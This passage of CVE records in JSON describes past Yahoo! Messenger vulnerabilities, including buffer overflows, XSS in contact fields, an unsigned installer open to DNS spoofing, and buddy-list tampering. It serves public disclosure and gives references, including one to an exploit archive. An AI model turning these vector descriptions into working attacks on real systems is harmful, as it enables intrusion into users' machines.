                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "CA-2002-16",
              "refsource": "CERT",
              "url": "http://www.cert.org/advisories/CA-2002-16.html"
            },
            {
              "name": "20020221 Remote crashes in Yahoo messenger",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
            },
            {
              "name": "VU#755755",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/755755"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2002-1665",
    "datePublished": "2005-05-28T04:00:00",
    "dateReserved": "2005-05-28T00:00:00",
    "dateUpdated": "2024-08-08T03:34:55.665Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2002-1664 (GCVE-0-2002-1664)
Vulnerability from cvelistv5
Published
2005-05-28 04:00
Modified
2024-08-08 03:34
Severity ?
CWE
  • n/a
Summary
Yahoo! Messenger before February 2002 allows remote attackers to add arbitrary users to another user's buddy list and possibly obtain sensitive information.
References
http://www.cert.org/advisories/CA-2002-16.html — third-party-advisory, x_refsource_CERT
http://marc.info/?l=bugtraq&m=101439616623230&w=2 — mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/393195 — third-party-advisory, x_refsource_CERT-VN
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T03:34:55.719Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "CA-2002-16",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT",
              "x_transferred"
            ],
            "url": "http://www.cert.org/advisories/CA-2002-16.html"
          },
          {
            "name": "20020221 Remote crashes in Yahoo messenger",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
          },
          {
            "name": "VU#393195",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/393195"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2002-02-21T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Yahoo! Messenger before February 2002 allows remote attackers to add arbitrary users to another user\u0027s buddy list and possibly obtain sensitive information."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-10-17T13:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "CA-2002-16",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT"
          ],
          "url": "http://www.cert.org/advisories/CA-2002-16.html"
        },
        {
          "name": "20020221 Remote crashes in Yahoo messenger",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
        },
        {
          "name": "VU#393195",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/393195"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2002-1664",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Yahoo! Messenger before February 2002 allows remote attackers to add arbitrary users to another user\u0027s buddy list and possibly obtain sensitive information."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "CA-2002-16",
              "refsource": "CERT",
              "url": "http://www.cert.org/advisories/CA-2002-16.html"
            },
            {
              "name": "20020221 Remote crashes in Yahoo messenger",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
            },
            {
              "name": "VU#393195",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/393195"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2002-1664",
    "datePublished": "2005-05-28T04:00:00",
    "dateReserved": "2005-05-28T00:00:00",
    "dateUpdated": "2024-08-08T03:34:55.719Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2007-4515 (GCVE-0-2007-4515)
Vulnerability from cvelistv5
Published
2007-08-31 22:00
Modified
2024-08-07 15:01
Severity ?
CWE
  • n/a
Summary
Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods. NOTE: some of these details are obtained from third party information.
References
http://osvdb.org/37739 — vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/26579 — third-party-advisory, x_refsource_SECUNIA
https://exchange.xforce.ibmcloud.com/vulnerabilities/36363 — vdb-entry, x_refsource_XF
http://messenger.yahoo.com/security_update.php?id=082907 — x_refsource_CONFIRM
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591 — third-party-advisory, x_refsource_IDEFENSE
http://securityreason.com/securityalert/3083 — third-party-advisory, x_refsource_SREASON
http://securitytracker.com/id?1018628 — vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/25494 — vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2007/3011 — vdb-entry, x_refsource_VUPEN
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T15:01:09.859Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "37739",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/37739"
          },
          {
            "name": "26579",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/26579"
          },
          {
            "name": "yahoo-messenger-yverinfo-bo(36363)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://messenger.yahoo.com/security_update.php?id=082907"
          },
          {
            "name": "20070830 Yahoo Messenger YVerInfo.dll ActiveX Multiple Remote Buffer Overflow Vulnerabilities",
            "tags": [
              "third-party-advisory",
              "x_refsource_IDEFENSE",
              "x_transferred"
            ],
            "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
          },
          {
            "name": "3083",
            "tags": [
              "third-party-advisory",
              "x_refsource_SREASON",
              "x_transferred"
            ],
            "url": "http://securityreason.com/securityalert/3083"
          },
          {
            "name": "1018628",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1018628"
          },
          {
            "name": "25494",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/25494"
          },
          {
            "name": "ADV-2007-3011",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2007/3011"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-08-29T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods.  NOTE: some of these details are obtained from third party information."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-28T12:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "37739",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/37739"
        },
        {
          "name": "26579",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/26579"
        },
        {
          "name": "yahoo-messenger-yverinfo-bo(36363)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://messenger.yahoo.com/security_update.php?id=082907"
        },
        {
          "name": "20070830 Yahoo Messenger YVerInfo.dll ActiveX Multiple Remote Buffer Overflow Vulnerabilities",
          "tags": [
            "third-party-advisory",
            "x_refsource_IDEFENSE"
          ],
          "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
        },
        {
          "name": "3083",
          "tags": [
            "third-party-advisory",
            "x_refsource_SREASON"
          ],
          "url": "http://securityreason.com/securityalert/3083"
        },
        {
          "name": "1018628",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1018628"
        },
        {
          "name": "25494",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/25494"
        },
        {
          "name": "ADV-2007-3011",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2007/3011"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-4515",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods.  NOTE: some of these details are obtained from third party information."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "37739",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/37739"
            },
            {
              "name": "26579",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/26579"
            },
            {
              "name": "yahoo-messenger-yverinfo-bo(36363)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
            },
            {
              "name": "http://messenger.yahoo.com/security_update.php?id=082907",
              "refsource": "CONFIRM",
              "url": "http://messenger.yahoo.com/security_update.php?id=082907"
            },
            {
              "name": "20070830 Yahoo Messenger YVerInfo.dll ActiveX Multiple Remote Buffer Overflow Vulnerabilities",
              "refsource": "IDEFENSE",
              "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
            },
            {
              "name": "3083",
              "refsource": "SREASON",
              "url": "http://securityreason.com/securityalert/3083"
            },
            {
              "name": "1018628",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1018628"
            },
            {
              "name": "25494",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/25494"
            },
            {
              "name": "ADV-2007-3011",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2007/3011"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-4515",
    "datePublished": "2007-08-31T22:00:00",
    "dateReserved": "2007-08-23T00:00:00",
    "dateUpdated": "2024-08-07T15:01:09.859Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2007-4391 (GCVE-0-2007-4391)
Vulnerability from cvelistv5
Published
2007-08-17 22:00
Modified
2024-08-07 14:53
Severity ?
CWE
  • n/a
Summary
Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an "invite to view my webcam" request, and then injecting a DLL into the attacker's peer Yahoo! Messenger application when this request is accepted.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T14:53:55.679Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "ADV-2007-2917",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2007/2917"
          },
          {
            "name": "yahoo-messenger-webcam-bo(36115)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
          },
          {
            "name": "VU#515968",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/515968"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.team509.com/expyahoo.rar"
          },
          {
            "name": "26501",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/26501"
          },
          {
            "name": "25330",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/25330"
          },
          {
            "name": "38221",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/38221"
          },
          {
            "name": "1018586",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1018586"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-08-12T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an \"invite to view my webcam\" request, and then injecting a DLL into the attacker\u0027s peer Yahoo! Messenger application when this request is accepted."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-28T12:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "ADV-2007-2917",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2007/2917"
        },
        {
          "name": "yahoo-messenger-webcam-bo(36115)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
        },
        {
          "name": "VU#515968",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/515968"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.team509.com/expyahoo.rar"
        },
        {
          "name": "26501",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/26501"
        },
        {
          "name": "25330",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/25330"
        },
        {
          "name": "38221",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/38221"
        },
        {
          "name": "1018586",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1018586"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-4391",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an \"invite to view my webcam\" request, and then injecting a DLL into the attacker\u0027s peer Yahoo! Messenger application when this request is accepted."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "ADV-2007-2917",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2007/2917"
            },
            {
              "name": "yahoo-messenger-webcam-bo(36115)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
            },
            {
              "name": "VU#515968",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/515968"
            },
            {
              "name": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/",
              "refsource": "MISC",
              "url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
            },
            {
              "name": "http://www.team509.com/expyahoo.rar",
              "refsource": "MISC",
              "url": "http://www.team509.com/expyahoo.rar"
            },
            {
              "name": "26501",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/26501"
            },
            {
              "name": "25330",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/25330"
            },
            {
              "name": "38221",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/38221"
            },
            {
              "name": "1018586",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1018586"
            },
            {
              "name": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749",
              "refsource": "MISC",
              "url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-4391",
    "datePublished": "2007-08-17T22:00:00",
    "dateReserved": "2007-08-17T00:00:00",
    "dateUpdated": "2024-08-07T14:53:55.679Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2002-2361 (GCVE-0-2002-2361)
Vulnerability from cvelistv5
Published
2007-10-29 19:00
Modified
2024-09-17 01:20
Severity ?
CWE
  • n/a
Summary
The installer in Yahoo! Messenger 4.0, 5.0 and 5.5 does not verify package signatures which could allow remote attackers to install trojan programs via DNS spoofing.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T03:59:11.942Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "yahoo-installer-insecure-connection(9984)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "http://www.iss.net/security_center/static/9984.php"
          },
          {
            "name": "20020827 Yahoo Messenger Install Secuirty",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00384.html"
          },
          {
            "name": "5579",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/5579"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The installer in Yahoo! Messenger 4.0, 5.0 and 5.5 does not verify package signatures which could allow remote attackers to install trojan programs via DNS spoofing."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2007-10-29T19:00:00Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "yahoo-installer-insecure-connection(9984)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "http://www.iss.net/security_center/static/9984.php"
        },
        {
          "name": "20020827 Yahoo Messenger Install Secuirty",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00384.html"
        },
        {
          "name": "5579",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/5579"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2002-2361",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The installer in Yahoo! Messenger 4.0, 5.0 and 5.5 does not verify package signatures which could allow remote attackers to install trojan programs via DNS spoofing."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "yahoo-installer-insecure-connection(9984)",
              "refsource": "XF",
              "url": "http://www.iss.net/security_center/static/9984.php"
            },
            {
              "name": "20020827 Yahoo Messenger Install Secuirty",
              "refsource": "BUGTRAQ",
              "url": "http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00384.html"
            },
            {
              "name": "5579",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/5579"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2002-2361",
    "datePublished": "2007-10-29T19:00:00Z",
    "dateReserved": "2007-10-29T00:00:00Z",
    "dateUpdated": "2024-09-17T01:20:44.264Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2007-0768 (GCVE-0-2007-0768)
Vulnerability from cvelistv5
Published
2007-02-06 02:00
Modified
2024-08-07 12:34
Severity ?
CWE
  • n/a
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information.
References
http://www.securityfocus.com/bid/22269 - vdb-entry, x_refsource_BID
http://www.securityfocus.com/archive/1/458225/100/0/threaded - mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/archive/1/458305/100/0/threaded - mailing-list, x_refsource_BUGTRAQ
http://secunia.com/advisories/23928 - third-party-advisory, x_refsource_SECUNIA
http://osvdb.org/31674 - vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/archive/1/458494/100/0/threaded - mailing-list, x_refsource_BUGTRAQ
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T12:34:19.794Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "22269",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/22269"
          },
          {
            "name": "20070126 Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
          },
          {
            "name": "20070127 RE: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/458305/100/0/threaded"
          },
          {
            "name": "23928",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/23928"
          },
          {
            "name": "31674",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/31674"
          },
          {
            "name": "20070127 Re: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/458494/100/0/threaded"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-01-26T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields.  NOTE: some of these details are obtained from third party information."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-16T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "22269",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/22269"
        },
        {
          "name": "20070126 Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/458225/100/0/threaded"
        },
        {
          "name": "20070127 RE: Cross-site Scripting with Local Privilege Vulnerability in Yahoo Messenger",
          "tags": [
            "mailing-list",
